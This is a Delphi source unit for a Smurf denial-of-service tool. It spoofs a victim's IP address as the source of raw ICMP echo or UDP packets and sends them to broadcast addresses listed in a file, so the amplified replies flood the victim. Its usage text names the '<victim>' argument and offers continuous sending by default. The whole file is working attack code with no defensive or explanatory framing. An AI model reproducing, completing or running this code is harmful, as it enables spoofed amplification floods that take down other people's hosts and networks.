unit u_main;

interface

uses
  u_winsck2, u_sysutils, u_sockhdr;

type
  TAttackType = set of (TICMP, TUDP);
  TBCastIPList = array of Cardinal;
  TPortList = array of Word;
  
  TSmurfOptions = packed record 
    AttackType: TAttackType;
    Delay, Victim: Cardinal;
    BCastFile: TextFile;
    BCastList: TBCastIPList;
    HedefAdres: TSockAddrIn;
    Num, PacketSize, PaddingSize, RandomSeek, Sended: Integer;
    Padding: PChar;
    PFile: file;
    Socket: TSocket;
    UDP_dstPortList: TPortList;
    UDP_srcPort: Word;
    UsePadding: Boolean;
  end;

var
  SmurfOpt: TSmurfOptions;

  function GetPorts(Ports: string): TPortList;
  function GetRandomValue(const Range: Integer): Integer;
  function Gonder(s: TSocket; var Buf; len, flags: Integer;
    var addrto: TSockAddr; tolen: Integer): Integer;
  function Resolve(const host: PChar): Cardinal;
  function SetBCastList: Integer;
  procedure CreateSocket;
  procedure LoadBCastFile(const FileName: string);
  procedure LoadDataFile(const FileName: string);
  procedure SetDefaultOptions;
  procedure SetParams;
  procedure SmurfICMP(const dst: Cardinal);
  procedure SmurfICMP_FillIPhdr(const IPhdr: PIPhdr; const dst: Cardinal);
  procedure SmurfUDP(const dst: Cardinal; const Port: Word);
  procedure SmurfUDP_FillIPhdr(const IPhdr: PIPhdr; const dst: Cardinal);
  procedure SmurfUDP_FillUDPhdr(const UDPhdr: PUDPhdr; const IPhdr: PIPhdr;
    const dstport: Word);
  procedure Usage(const Path: string);

implementation

function GetPorts(Ports: string): TPortList;
  procedure AddPort(const APort: string);
  var
    Port: integer;
  begin
    Port := StrtoIntDef(APort, -1);
    if (Port > -1) and (Port < 65536) then
    begin
      SetLength(Result, Length(Result) + 1);
      Result[High(Result)] := Port;
    end
      else Writeln('Skipping invalid port: ' + APort);
  end;
var
  CommaPos: Integer;
  Port: string;
begin
  CommaPos := Pos(',', Ports);
  while CommaPos > 0 do
  begin
    Port := Copy(Ports, 1, CommaPos - 1);
    AddPort(Port);
    Delete(Ports, 1, CommaPos);
    CommaPos := Pos(',', Ports);
  end;
  AddPort(Ports); 
end;

function GetRandomValue(const Range: Integer): Integer;
begin                                            
  Random;
  Inc(SmurfOpt.RandomSeek);
  Result := (Random(High(Integer)) + SmurfOpt.RandomSeek*$FFFF) mod Range;
end;

function Gonder(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr;
  tolen: Integer): Integer; 
var
  LastError: Integer;
begin
  WSASetLastError(0);
  Result := Sendto(s, Buf, len, flags, addrto, tolen); 
  LastError := WSAGetLastError;
  if LastError <> 0 then
    Writeln('Unable to send smurf packet. Error code: ' + InttoStr(LastError));
end;

function Resolve(const host: PChar): Cardinal; 
var
  InAddr: TInAddr;
  HostEnt: PHostEnt;
begin
  InAddr.S_addr := inet_addr(host);
  if InAddr.S_addr = INADDR_NONE then
  begin
    HostEnt := GetHostByName(host);
    if not Assigned(HostEnt) then 
    begin
      Writeln('Error: Unable to resolve host: ' + host);
      Halt(0);
    end;
    Move((HostEnt^.h_addr_list^)^, InAddr.S_addr, HostEnt^.h_length); 
  end;
  Result := InAddr.S_addr;
end;

function SetBCastList: Integer;
var
  OriLine, Line: string;
  Addr: Cardinal;
begin
  Result := 0;
  try
    while not Eof(SmurfOpt.BCastFile) do
    begin
      Readln(SmurfOpt.BCastFile, OriLine);
      Line := Trim(OriLine);
      if Line = '' then
        Continue;
      if Line[1] = '#' then
        Continue;
      Addr := inet_addr(PChar(Line));
      if Addr = INADDR_NONE then
      begin
        Writeln('Skipping invalid bcast ip: ' + Line);
        Continue;
      end;
      SetLength(SmurfOpt.BCastList, Length(SmurfOpt.BCastList) + 1);
      SmurfOpt.BCastList[High(SmurfOpt.BCastList)]:= Addr;
      Inc(Result);
    end;
  finally
    CloseFile(SmurfOpt.BCastFile);
  end;
end;

procedure CreateSocket;
begin
  SmurfOpt.Socket := Socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if SmurfOpt.Socket = INVALID_SOCKET then
  begin
    Writeln('Error on creating socket');
    Halt(0);
  end;
  if SetSockOpt(SmurfOpt.Socket, IPPROTO_IP, IP_HDRINCL, '1', 4) <> 0 then
  begin 
    Writeln('Error: IP_HDRINCL'#13#10 +
            '(Note that this program only works on Windows XP)');
    Halt(0);
  end;
end;

procedure LoadBCastFile(const FileName: string);
begin
  if not ValidTextFile(SmurfOpt.BCastFile, FileName) then
  begin
    if not ValidTextFile(SmurfOpt.BCastFile, ExtractFilePath(ParamStr(0)) + FileName) then
    begin
      Writeln('Unable to load bcast file: ' + FileName);
      Halt(0);
    end;
  end;
  if SetBCastList = 0 then
  begin
    Writeln('No valid IP found on the bcast list');
    Halt(0);
  end;
end;

procedure LoadDataFile(const FileName: string);
begin
  if not ValidFile(SmurfOpt.PFile, FileName) then
  begin
    if not ValidFile(SmurfOpt.PFile, ExtractFilePath(ParamStr(0)) + FileName) then
    begin
      Writeln('Unable to load data file: ' + FileName);
      Halt(0);
    end;
  end;
  Seek(SmurfOpt.PFile, 0);
  SmurfOpt.PaddingSize := FileSize(SmurfOpt.PFile);
  SmurfOpt.Padding := AllocMem(SmurfOpt.PaddingSize);
  {$I-}
  try
    BlockRead(SmurfOpt.PFile, SmurfOpt.Padding^, SmurfOpt.PaddingSize);
    SmurfOpt.UsePadding := True;
  except
    Writeln('An error occured on reading data file');
  end;
  {$I+}
  CloseFile(SmurfOpt.PFile);
end;

procedure SetDefaultOptions;
begin
  SmurfOpt.Victim := Resolve(PChar(ParamStr(1)));
  SmurfOpt.AttackType := [TICMP];
  SmurfOpt.HedefAdres.sin_family := AF_INET;
  SmurfOpt.HedefAdres.sin_port := htons(GetRandomValue(High(Word)) + 1);
  SmurfOpt.PacketSize := 64;
  SetLength(SmurfOpt.UDP_dstPortList, 1);
  SmurfOpt.UDP_dstPortList[0] := 7;
end;

procedure SetParams;
var
  i: Integer;
  pstr, Ports: string;
  AssignedPorts: Boolean;
  Ch: Char;
begin
  AssignedPorts := False;
  for i := 3 to ParamCount do
  begin
    pstr := ParamStr(i);
    Ch := #0;
    if Length(pstr) = 2 then
      if pstr[1] = '-' then
        Ch := pstr[2]; 
    if Ch = #0 then Continue;
    case Ch of
      'p':
        begin
          AssignedPorts := True;
          Ports := ParamStr(i + 1);
        end;
      's': SmurfOpt.UDP_srcPort := StrtoIntDef(ParamStr(i + 1), 0);
      'P':
        begin
          if LowerCase(ParamStr(i + 1)) = 'icmp' then
            SmurfOpt.AttackType := [TICMP]
          else
            if LowerCase(ParamStr(i + 1)) = 'udp' then
              SmurfOpt.AttackType := [TUDP]
            else
              if LowerCase(ParamStr(i + 1)) = 'both' then
                SmurfOpt.AttackType := [TICMP, TUDP]
              else begin
                Writeln('Protocol must be icmp, udp or both');
                Halt(0);
              end;
        end;
      'S': SmurfOpt.PacketSize := StrtoIntDef(ParamStr(i + 1), 64);
      'f': LoadDataFile(ParamStr(i + 1));
      'n': SmurfOpt.Num := StrtoIntDef(ParamStr(i + 1), 0);
      'd': SmurfOpt.Delay := StrtoIntDef(ParamStr(i + 1), 0);
    end;
  end;
  if AssignedPorts and (TUDP in SmurfOpt.AttackType) then
  begin
    SmurfOpt.UDP_dstPortList := GetPorts(Ports);
    if Length(SmurfOpt.UDP_dstPortList) = 0 then
    begin
      Writeln('No valid ports found on the list'#13#10 +
              'Using port 7 instead' 
              );
      SetLength(SmurfOpt.UDP_dstPortList, 1);
      SmurfOpt.UDP_dstPortList[0] := 7;
    end;
  end;
end;

var
  Len: Integer = 28;
  Buf: array of Char;

procedure SmurfICMP(const dst: Cardinal);
var
  IPhdr: PIPhdr;
  ICMPhdr: PICMPhdr;
begin
  if Length(Buf) = 0 then
  begin
    if SmurfOpt.UsePadding then
      Inc(Len, SmurfOpt.PaddingSize)
    else
      Inc(Len, SmurfOpt.PacketSize);
    SetLength(Buf, Len);
  end;
  FillChar(Buf[0], Length(Buf), 0);
  IPhdr := @Buf[0];
  ICMPhdr := @Buf[20];
  if SmurfOpt.UsePadding then
    Move(SmurfOpt.Padding^, Buf[28], SmurfOpt.PaddingSize);
  SmurfICMP_FillIPhdr(IPhdr, dst);
  ICMPhdr.icmp_type := 8;
  ICMPhdr.icmp_sum := CheckSum(@ICMPhdr^, Len - 20);
  Gonder(SmurfOpt.Socket, Buf[0], Len, 0, SmurfOpt.HedefAdres, Sizeof(SmurfOpt.HedefAdres));
end;

procedure SmurfICMP_FillIPhdr(const IPhdr: PIPhdr; const dst: Cardinal);
begin
  IPhdr.ip_verlen := $45;
  IPhdr.ip_tos := 60;
  IPhdr.ip_len := htons(Len);
  IPhdr.ip_id := GetRandomValue(65535) + 1;
  IPhdr.ip_ttl := 255;
  IPhdr.ip_p := 1;
  IPhdr.ip_src := SmurfOpt.Victim;
  IPhdr.ip_dst := dst;
  IPhdr.ip_sum := CheckSum(@IPhdr^, 20);
  SmurfOpt.HedefAdres.sin_addr.S_addr := IPhdr.ip_dst;
end;
  
procedure SmurfUDP(const dst: Cardinal; const Port: Word);
var
  IPhdr: PIPhdr;
  UDPhdr: PUDPhdr;
begin
  if Length(Buf) = 0 then
  begin
    if SmurfOpt.UsePadding then
      Inc(Len, SmurfOpt.PaddingSize)
    else
      Inc(Len, SmurfOpt.PacketSize);
    SetLength(Buf, Len)
  end;
  FillChar(Buf[0], Length(Buf), 0);
  IPhdr := @Buf[0];
  UDPhdr := @Buf[20];
  if SmurfOpt.UsePadding then
    Move(SmurfOpt.Padding^, Buf[28], SmurfOpt.PaddingSize);
  SmurfUDP_FillIPhdr(IPhdr, dst);
  SmurfUDP_FillUDPhdr(UDPhdr, IPhdr, Port);
  Gonder(SmurfOpt.Socket, Buf[0], Len, 0, SmurfOpt.HedefAdres, Sizeof(SmurfOpt.HedefAdres));
end;

procedure SmurfUDP_FillIPhdr(const IPhdr: PIPhdr; const dst: Cardinal);
begin
  IPhdr.ip_verlen := $45;
  IPhdr.ip_tos := 60;
  IPhdr.ip_len := htons(Len);
  IPhdr.ip_id := htons(GetRandomValue(65535) + 1);
  IPhdr.ip_ttl := 255;
  IPhdr.ip_p := 17;
  IPhdr.ip_src := SmurfOpt.HedefAdres.sin_addr.S_addr;
  IPhdr.ip_dst := dst;
  IPhdr.ip_sum := CheckSum(@IPhdr^, 20);
  SmurfOpt.HedefAdres.sin_addr.S_addr := IPhdr.ip_dst;
end;

procedure SmurfUDP_FillUDPhdr(const UDPhdr: PUDPhdr; const IPhdr: PIPhdr;
  const dstport: Word);
var
  seudoBuf: PChar;
  pseudo: Ppseudohdr_udp;
begin
  seudoBuf := AllocMem(Len - 8);
  try
    pseudo := Ppseudohdr_udp(seudoBuf);
    if SmurfOpt.UDP_srcPort = 0 then
      UDPhdr.udp_sport := htons(GetRandomValue(65535) + 1)
    else
      UDPhdr.udp_sport := htons(SmurfOpt.UDP_srcPort);
    if dstport = 0 then
      UDPhdr.udp_dport := htons(GetRandomValue(65535) + 1)
    else
      UDPhdr.udp_dport := htons(dstport);
    UDPhdr.udp_ulen := htons(Len - 20);
    if SmurfOpt.UsePadding then
      Move(SmurfOpt.Padding^, (seudoBuf + 20)^, SmurfOpt.PaddingSize);
    pseudo.saddr := IPhdr.ip_src;
    pseudo.daddr := IPhdr.ip_dst;
    pseudo.protocol := IPhdr.ip_p;
    pseudo.length := UDPhdr.udp_ulen;
    pseudo.udphdr := UDPhdr^;
    UDPhdr.udp_sum := CheckSum(@seudoBuf^, Len - 8);
  finally
    FreeMem(seudoBuf);
  end;
  SmurfOpt.HedefAdres.sin_port := UDPhdr.udp_dport;
end;

procedure Usage(const Path: string); 
begin
  Write(
        'usage: ' + Path + ' <victim> <broadcast file> [options]'#13#10#13#10 +
        'Options:'#13#10 +
        '  -p:    Comma separated list of dest ports         (default 7) (0 is random)'#13#10 +
        '  -s:    Source port (for udp only)                 (0 is random (default))'#13#10 +
        '  -P:    Protocols to use. Either icmp, udp or both (default icmp)'#13#10 +
        '  -S:    Data size in bytes                         (default 64)'#13#10 +
        '  -f:    Filename containg data                     (not needed)'#13#10 +
        '  -n:    Num of packets to send                     (0 is continuous (default))'#13#10 +
        '  -d:    Delay (in ms)                              (default 0)'#13#10
       );
  Halt(0);
end;

end.
